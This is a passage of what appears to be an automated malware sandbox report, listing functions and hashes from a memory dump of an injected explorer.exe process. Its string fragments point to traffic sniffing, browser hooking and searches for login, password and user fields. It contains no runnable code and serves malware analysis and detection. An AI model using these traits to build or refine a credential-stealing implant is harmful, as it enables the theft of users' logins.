                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .dll$el32$h$kern
                                      • API String ID: 0-4264704552
                                      • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                      • Instruction ID: e9b4ed66ca985f4730e2aa314a44df2765ecf8077e3246c927a90a174176108d
                                      • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                      • Instruction Fuzzy Hash: 17418570608B488FD769DF2894983AAB7E1FBA8301F144A2FD59EC3265DB70C945CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E7060B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $Snif$f fr$om:
                                      • API String ID: 0-3434893486
                                      • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                      • Instruction ID: b5acecc76be0304af396c321bd0fa4a333255ace95586a0055e95e9a0fc303a8
                                      • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                      • Instruction Fuzzy Hash: 7931C57151CB489FD71ADF68C4986DAB7D4FB94300F504D1ED49BC72A1EE30AA4ACB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E7060C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $Snif$f fr$om:
                                      • API String ID: 0-3434893486
                                      • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                      • Instruction ID: 602c330575d5bcd6e23cc6d90d3c5c16ff9ac74ae672cb044d1fe7a294eb385e
                                      • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                      • Instruction Fuzzy Hash: 9C31C571518B48AFD729EF24C4986DAB7D4FB94300F504D1EE49BC72A5EE30EA06CA42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E701FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .dll$chro$hild$me_c
                                      • API String ID: 0-3136806129
                                      • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                      • Instruction ID: 46925d62a66058b7a6bdf35020e8855bdb4c330d505b4757146ded6c8eb10e95
                                      • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                      • Instruction Fuzzy Hash: C8317231118B488FC784EF689498BAAB7E1FBD8300F84493D944AC72A5DF30CA45CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E701FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .dll$chro$hild$me_c
                                      • API String ID: 0-3136806129
                                      • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                      • Instruction ID: 7b73391115b9a1bf4f9f931734e512b8f1e6929ac2b930cba51a4e461e87cc61
                                      • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                      • Instruction Fuzzy Hash: 02317271118B488FC794EF689498BAAB7E1FFD8300F844A3D944AC72A5DF30CA45CB56
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E7048C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                      • API String ID: 0-319646191
                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                      • Instruction ID: 2060dfd28831496c3dbad5fe138b63dccf0a246e2fd7de40949b69ce99dfd0f7
                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                      • Instruction Fuzzy Hash: 0031E331614A0C8FCB14EFA8C8887EDB7E0FF58205F40062AD45ED7290DF748A45C789
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E7048BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                      • API String ID: 0-319646191
                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                      • Instruction ID: fa64614ee70e16273fed8b61b20cd37c75c9c729fb61cc909afdaa0cd5bb08f6
                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                      • Instruction Fuzzy Hash: 1A21E630A10A0CCFCB15EFA8C8487ED7BE0FF58204F40462AD45AD7290DF749A05CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E705E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .$l$l$t
                                      • API String ID: 0-168566397
                                      • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                      • Instruction ID: c6bf54c4188c523a1c9eac14986943fa03e5baf5e1a14048373cd2105166160d
                                      • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                      • Instruction Fuzzy Hash: 5C217C70A24B0DDBDB44EFA8D0487EEBAF0FB58304F504A2ED019D3660DB749A518B84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E705E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .$l$l$t
                                      • API String ID: 0-168566397
                                      • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                      • Instruction ID: 223e5fedc36cca7804e461d89228de4a602e0e2157d284a5cf801674e18d1962
                                      • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                      • Instruction Fuzzy Hash: 7A218B70A24A0DDBDB48EFA8D0487EEBBF0FB58304F504A2ED019D3650DB749A518B84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E705FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: auth$logi$pass$user
                                      • API String ID: 0-2393853802
                                      • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                      • Instruction ID: 562061f22a2c573669483d1b04ca3eb6046e7707c59e53fc313cfca41ef5fe37
                                      • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                      • Instruction Fuzzy Hash: A921C030624B0DCBCB05DF9998906EEB7E1EF88344F404619E40ADB294D7B1DA148BC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%